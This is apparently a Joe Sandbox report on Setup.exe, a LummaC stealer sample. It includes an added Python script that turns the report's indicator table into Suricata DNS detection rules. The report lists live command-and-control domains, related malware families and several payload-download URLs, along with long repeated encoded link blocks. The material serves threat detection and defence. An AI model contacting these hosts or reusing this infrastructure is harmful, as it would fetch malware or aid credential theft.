                                                                                                                                        unknown
IP | Domain | Country | ASN | ASN name | Malicious
188.114.97.3 | mathcucom.sbs | European Union | 13335 | CLOUDFLARENETUS | true
104.21.33.249 | enlargkiw.sbs | United States | 13335 | CLOUDFLARENETUS | true
172.67.173.224 | ehticsprocw.sbs | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | drawwyobstacw.sbs | European Union | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
172.67.140.193 | vennurviot.sbs | United States | 13335 | CLOUDFLARENETUS | true
104.21.77.78 | resinedyw.sbs | United States | 13335 | CLOUDFLARENETUS | true
104.21.79.35 | condifendteu.sbs | United States | 13335 | CLOUDFLARENETUS | true
172.67.206.204 | sergei-esenin.com | United States | 13335 | CLOUDFLARENETUS | true
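Two things in the table above matter when turning it into detections. First, every address sits in a Cloudflare (ASN 13335) or Akamai (ASN 16625) range, so an IP blocklist built from this report would block shared CDN edges used by benign tenants; the durable indicator is the domain, not the IP. Second, steamcommunity.com is flagged "true" because the sample reached it (the memory strings show a profile URL), but it is a legitimate service and must not be blocked outright. The script below is an added example, not part of the Joe Sandbox report or its tooling: it takes the rows above, copied by hand, separates what can be blocked by name from what should only be watched, and emits one Suricata dns.query rule per blockable domain. The shared-infrastructure ASN set, the allowlist, and the SID base 9000000 are assumptions for illustration.

```python
# Added example: triage a Joe Sandbox "IP / Domain / ASN / Malicious" table into
# deployable indicators. Rows are copied from the report; the ASN set, the
# allowlist and the SID base are assumptions, not report data.
from dataclasses import dataclass


@dataclass(frozen=True)
class IocRow:
    ip: str
    domain: str
    asn: int
    asn_name: str
    malicious: bool


# Constructed from the report's IP table (values as shown on the page).
REPORT_ROWS = [
    IocRow("188.114.97.3",   "mathcucom.sbs",      13335, "CLOUDFLARENETUS", True),
    IocRow("104.21.33.249",  "enlargkiw.sbs",      13335, "CLOUDFLARENETUS", True),
    IocRow("172.67.173.224", "ehticsprocw.sbs",    13335, "CLOUDFLARENETUS", True),
    IocRow("188.114.96.3",   "drawwyobstacw.sbs",  13335, "CLOUDFLARENETUS", True),
    IocRow("104.102.49.254", "steamcommunity.com", 16625, "AKAMAI-ASUS",     True),
    IocRow("172.67.140.193", "vennurviot.sbs",     13335, "CLOUDFLARENETUS", True),
    IocRow("104.21.77.78",   "resinedyw.sbs",      13335, "CLOUDFLARENETUS", True),
    IocRow("104.21.79.35",   "condifendteu.sbs",   13335, "CLOUDFLARENETUS", True),
    IocRow("172.67.206.204", "sergei-esenin.com",  13335, "CLOUDFLARENETUS", True),
]

# Shared CDN / reverse-proxy ASNs (assumed set): an address here is not
# attributable to a single tenant, so it must not go on an IP blocklist.
SHARED_INFRA_ASNS = {13335, 16625}

# Legitimate services the sample merely contacts (assumed allowlist): alert on
# them in context, never block them by name.
ALLOWLIST = {"steamcommunity.com"}


def triage(rows, shared_asns=SHARED_INFRA_ASNS, allowlist=ALLOWLIST):
    """Split report rows into block-by-domain, watch-only and IP buckets."""
    block_domains, watch_domains, block_ips, unsafe_ips = set(), set(), set(), set()
    for r in rows:
        if not r.malicious:
            continue
        if r.domain in allowlist:
            watch_domains.add(r.domain)
        else:
            block_domains.add(r.domain)
        if r.asn in shared_asns:
            unsafe_ips.add(r.ip)   # CDN edge shared with benign sites
        else:
            block_ips.add(r.ip)    # attributable address, safe to block
    return {
        "block_domains": sorted(block_domains),
        "watch_domains": sorted(watch_domains),
        "block_ips": sorted(block_ips),
        "unsafe_ips": sorted(unsafe_ips),
    }


def suricata_dns_rules(domains, sid_base=9000000):
    """One dns.query rule per domain; sid_base is an assumed local SID range."""
    rules = []
    for i, d in enumerate(sorted(domains)):
        rules.append(
            f'alert dns any any -> any any (msg:"LummaC C2 DNS lookup {d}"; '
            f'dns.query; content:"{d}"; nocase; endswith; '
            f'classtype:trojan-activity; sid:{sid_base + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    result = triage(REPORT_ROWS)
    for bucket, values in result.items():
        print(f"{bucket}: {values}")
    print("\n".join(suricata_dns_rules(result["block_domains"])))
```

Running it lists eight blockable domains, steamcommunity.com on the watch list, an empty IP blocklist, and all nine addresses under unsafe_ips; the printed rules can be appended to a local Suricata rules file as-is.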
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532358
Start date and time: 2024-10-13 01:42:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/4@11/9
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 20
• Number of non-executed functions: 109
Cookbook Comments:
• Found application associated with file extension: .exe
• Processes excluded from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Domains excluded from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 6712, because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Setup.exe
Time | Type | Description
19:43:18 | API Interceptor | 6x Sleep call for process: BitLockerToGo.exe modified
Match | Associated sample name / URL | Detection | Threat name | Context
188.114.97.3 | AeYgxx6XFk.exe | malicious | DCRat, PureLog Stealer, zgRAT | kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
188.114.97.3 | http://host.cloudsonicwave.com | malicious | Unknown | host.cloudsonicwave.com/favicon.ico
188.114.97.3 | alWUxZvrvU.exe | malicious | FormBook | www.avantfize.shop/q8x9/
188.114.97.3 | foljNJ4bug.exe | malicious | FormBook | www.bayarcepat19.click/fxts/
188.114.97.3 | RRjzYVukzs.exe | malicious | DCRat, PureLog Stealer, zgRAT | 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
188.114.97.3 | octux.exe.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | 1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe | malicious | FormBook | www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
188.114.97.3 | BILL OF LADDING.exe | malicious | FormBook | www.launchdreamidea.xyz/bd77/
188.114.97.3 | http://embittermentdc.com | malicious | Unknown | embittermentdc.com/favicon.ico
188.114.97.3 | scan_374783.js | malicious | AgentTesla | paste.ee/d/gvOd3
104.21.33.249 | Solara.exe | malicious | LummaC | -
104.21.33.249 | Loader.exe | malicious | LummaC | -
104.21.33.249 | Solara.exe | malicious | LummaC | -
104.21.33.249 | Setup.exe | malicious | LummaC | -
104.21.33.249 | CachemanTray_[1MB]_[unsign].exe | malicious | LummaC | -
104.21.33.249 | SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | malicious | LummaC, Vidar | -
172.67.173.224 | Loader.exe | malicious | LummaC | -
172.67.173.224 | ASmartCore_[1MB]_[unsign].exe | malicious | LummaC | -
188.114.96.3 | DRAFT DOC2406656.bat.exe | malicious | Lokibot | touxzw.ir/sirr/five/fre.php
188.114.96.3 | lv961v43L3.exe | malicious | DCRat, PureLog Stealer, zgRAT | 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
188.114.96.3 | 10092024150836 09.10.2024.vbe | malicious | FormBook | www.airgame.store/ojib/
188.114.96.3 | Hesap-hareketleriniz.exe | malicious | FormBook | www.cc101.pro/59fb/
188.114.96.3 | octux.exe.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.96.3 | bX8NyyjOFz.exe | malicious | FormBook | www.rtprajalojago.live/2uvi/
188.114.96.3 | lWfpGAu3ao.exe | malicious | FormBook | www.serverplay.live/71nl/
188.114.96.3 | sa7Bw41TUq.exe | malicious | FormBook | www.cc101.pro/0r21/
188.114.96.3 | E_receipt.vbs | malicious | Unknown | paste.ee/d/VO2TX
188.114.96.3 | QUOTATION_OCTQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | filetransfer.io/data-package/fOmsJ2bL/download
Match (one group per line), then per associated sample: Associated Sample Name / URL | Detection | Threat Name | Context

drawwyobstacw.sbs
  Solara.exe | malicious | LummaC | 188.114.96.3
  Loader.exe | malicious | LummaC | 188.114.96.3
  Wintohdd.exe | malicious | LummaC | 188.114.96.3
  670937a58778f_LisioFirendes.exe | malicious | LummaC | 188.114.96.3
  ASmartCore_[1MB]_[unsign].exe | malicious | LummaC | 188.114.96.3
  Solara.exe | malicious | LummaC | 188.114.96.3
  Setup.exe | malicious | LummaC | 188.114.96.3
  CachemanTray_[1MB]_[unsign].exe | malicious | LummaC | 188.114.96.3
  vsYkceYJOX.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar | 188.114.97.3
  SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | malicious | LummaC, Vidar | 188.114.96.3

vennurviot.sbs
  Solara.exe | malicious | LummaC | 172.67.140.193
  Loader.exe | malicious | LummaC | 172.67.140.193
  Wintohdd.exe | malicious | LummaC | 172.67.140.193
  670937a58778f_LisioFirendes.exe | malicious | LummaC | 172.67.140.193
  ASmartCore_[1MB]_[unsign].exe | malicious | LummaC | 104.21.46.170
  Solara.exe | malicious | LummaC | 172.67.140.193
  Setup.exe | malicious | LummaC | 104.21.46.170
  CachemanTray_[1MB]_[unsign].exe | malicious | LummaC | 172.67.140.193
  vsYkceYJOX.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar | 104.21.46.170
  SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | malicious | LummaC, Vidar | 172.67.140.193

steamcommunity.com
  Solara.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  Loader.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254
  file.exe | malicious | LummaC | 104.102.49.254

condifendteu.sbs
  Solara.exe | malicious | LummaC | 172.67.141.136
  Loader.exe | malicious | LummaC | 104.21.79.35
  Wintohdd.exe | malicious | LummaC | 172.67.141.136
  670937a58778f_LisioFirendes.exe | malicious | LummaC | 104.21.79.35
  ASmartCore_[1MB]_[unsign].exe | malicious | LummaC | 104.21.79.35
  Solara.exe | malicious | LummaC | 104.21.79.35
  Setup.exe | malicious | LummaC | 172.67.141.136
  CachemanTray_[1MB]_[unsign].exe | malicious | LummaC | 104.21.79.35
  vsYkceYJOX.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar | 172.67.141.136
  SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | malicious | LummaC, Vidar | 104.21.79.35
Match (one group per line), then per associated sample: Associated Sample Name / URL | Detection | Threat Name | Context

CLOUDFLARENETUS
  v.1.6.3__x64__.msi | malicious | LegionLoader | 172.67.221.87
  phantomtoolsv2.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
  FluxusV2.exe | malicious | Python Stealer, CStealer | 104.26.3.16
  Solara.exe | malicious | LummaC | 104.21.77.78
  file.exe | malicious | LummaC | 172.67.206.204
  file.exe | malicious | LummaC | 172.67.206.204
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=AABJIKCyntddafHrxXwMffbew9PUcwQ56WCR8mvcT/7tDRFoJSRw3QNX02Q/MIVoixgn9dE9sMMP0GDnwqQ0LdLGXfvFaDm4lnRP0nKKMx/K5F9QxPOFroSM5e8+RBG+qqCfBnKxbWihL3/38edMaV7uTv7a0UGb2nVUF+n7XQAl2QSudEpYlV++l35LZxi6JWsnjixzdQpF+bXikFz1oYDN6GSuDb0op6aViO8V/0UhqnTHHddY9/cqyxhVsr874sBNA2avRHpdaXr1CP2PeHJcUgsGQb+Q5ZsuH9DAP++Oq7lFPe0lbuV3tYUIr/YAS6C7DT9Oee2yUkZYYTbI0bVJgmpWHa/G9q/wBFVVHuCTY5U3Rk5FsGRYQV6gWYrnX5DIQf3ZS3CM9xlUC2XMY8/htbCHQHuT5hjcDdzUTL+rWXnJ/TpkKPDyDGmCQh8idvsKAqOWIYWkO3X5LUWuEryoODEKawcYmYfc7zahLtlk7MGx3wWvCKqqkAg6bFwWWKWXURv3AGYvESLycicJVk8PxbBHrVkb/ZjVWsbKsit0CCZTx+7Bs7ZMtFKW5bo+GHe3oXwvXrlQS2IjtYPTG6q1fOR5753mseQVzhjXvKuOJkAQb03nyAw9hJo2vgadjjmOtgB9 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=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&c=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 | malicious | Unknown | 23.227.38.65
CLOUDFLARENETUS
  v.1.6.3__x64__.msi | malicious | LegionLoader | 172.67.221.87
  phantomtoolsv2.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
  FluxusV2.exe | malicious | Python Stealer, CStealer | 104.26.3.16
  Solara.exe | malicious | LummaC | 104.21.77.78
  file.exe | malicious | LummaC | 172.67.206.204
  file.exe | malicious | LummaC | 172.67.206.204
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=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 | malicious | Unknown | 23.227.38.65
CLOUDFLARENETUS
  v.1.6.3__x64__.msi | malicious | LegionLoader | 172.67.221.87
  phantomtoolsv2.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
  FluxusV2.exe | malicious | Python Stealer, CStealer | 104.26.3.16
  Solara.exe | malicious | LummaC | 104.21.77.78
  file.exe | malicious | LummaC | 172.67.206.204
  file.exe | malicious | LummaC | 172.67.206.204
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=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 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5 | malicious | Unknown | 23.227.38.65
  https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=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&c=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 | malicious | Unknown | 23.227.38.65
CLOUDFLARENETUS | v.1.6.3__x64__.msi | malicious | LegionLoader
  • 172.67.221.87
phantomtoolsv2.exe | malicious | CredGrabber, Meduza Stealer
  • 104.26.13.205
FluxusV2.exe | malicious | Python Stealer, CStealer
  • 104.26.3.16
Solara.exe | malicious | LummaC
  • 104.21.77.78
file.exe | malicious | LummaC
  • 172.67.206.204
file.exe | malicious | LummaC
  • 172.67.206.204
                                                                                                                                                        https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=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 hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.227.38.65
